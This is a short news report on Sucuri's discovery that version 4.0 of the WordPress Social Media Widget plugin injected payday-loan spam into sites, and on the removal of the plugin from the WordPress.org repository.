Researchers at Sucuri have found that version 4.0 of the WordPress Social Media Widget, also referred to as social-media-widget, has been injecting spam advertisements into sites. It is recommended that anyone using the widget, which has over 900,000 users, remove or disable it as soon as possible. The researchers believe the malicious code, which added “Pay Day Loan” spam into sites which ran the plugin, was added at the end of March when the developers released version 4.0 to the WordPress.org plugin repository.
The plugin, which changed maintainers in January, had already been noticed behaving oddly a month ago, but the malware in version 4.0 was more obvious, reading and executing a PHP script from a third-party site; the spam injection code was even tidied up to make it more compact. A 4.0.1 version of the plugin then appeared without the malware code, but the WordPress.org maintainers were having none of it – they said that they had removed the widget from the repository and pushed an update to users of the widget to remove it from their systems. Their advice to users is to find another plugin to replace social-media-widget, though they also say they will work with the plugin maintainer to “ensure that everything is good, all problems are solved, all i’s dotted and all t’s crossed”. Until then, the plugin will remain offline.
It is unclear how the code was added to the plugin; Sucuri notes that the changes are being made to the core of the plugin and suggest that “either it’s the author, or his credentials are compromised”. They also raise concerns about the repository’s processes, although the team resolved the issue quickly; they wonder if this is a new attack vector in the making and what can be done to prevent it being exploited.